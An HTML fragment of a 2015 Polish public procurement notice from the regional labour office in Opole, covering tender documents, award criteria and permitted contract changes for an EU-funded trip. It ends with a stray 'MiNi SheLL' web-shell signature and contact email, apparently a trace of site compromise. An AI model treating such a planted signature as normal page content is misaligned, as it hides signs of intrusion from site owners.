<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>-jeżeli Wykonawca polega na wiedzy i doświadczeniu, potencjale technicznym, osobach  zdolnych do wykonania zamówienia lub zdolnościach finansowych innych podmiotów, (niezależnie od charakteru prawnego łączących go z nimi stosunków) zobowiązany jest udowodnić Zamawiającemu, iż będzie dysponował zasobami niezbędnymi do realizacji zamówienia, w szczególności przedstawiając w tym celu pisemne zobowiązanie innych podmiotów do oddania do dyspozycji wykonawcy niezbędnych zasobów na okres korzystania z nich przy  wykonaniu zamówienia - wzór zobowiązania stanowi zał. nr 6 do formularza ofertowego,
- pełnomocnictwo do reprezentowania, o ile ofertę składa pełnomocnik.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 80</li>
<li>2 - Rok produkcji autokaru - 20</li>
</ul>
<p><b>IV.2.2)</b>
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
    <td><b>przeprowadzona będzie aukcja elektroniczna,</b> adres strony, na której będzie prowadzona: </td></tr>
</table>                            
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający dopuszcza następujące zmiany postanowień zawartej umowy:
1)	zmianę realizacji terminu wyjazdu - w przypadku przedłużającej się procedury przetargowej uniemożliwiającej zrealizowanie całej usługi w terminie wskazanym w §2 wzoru umowy lub wystąpienia innych przyczyny związanych z realizacją projektu Wsparcie kompetencji na starcie,
2)	zmianę poszczególnych elementów programu określonych w § 8 wzoru umowy w tym w szczególności zmianę kolejności i liczbę noclegu w poszczególnych miejscowościach, zmianę kolejności i długości spotkań w poszczególnych instytucjach - w przypadku wystąpienia okoliczności związanych z realizacją projektu Wsparcie kompetencji na starcie,
3)	zmianę ilości osób biorących udział w wyjeździe - w przypadku wystąpienia okoliczności związanych z realizacją projektu Wsparcie kompetencji na starcie,
4)	zmianę stawki podatku VAT w przypadku zmiany przepisów obowiązujących w tym zakresie.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.wup.opole.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Wojewódzki Urząd Pracy w Opolu, ul. Głogowska 25c, pok. nr 6 - parter.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 18.09.2015 godzina 10:00, miejsce: Wojewódzki Urząd Pracy w Opolu, ul. Głogowska 25c, pok. nr 10 (kancelaria) - parter.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Europejski Fundusz Społeczny.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com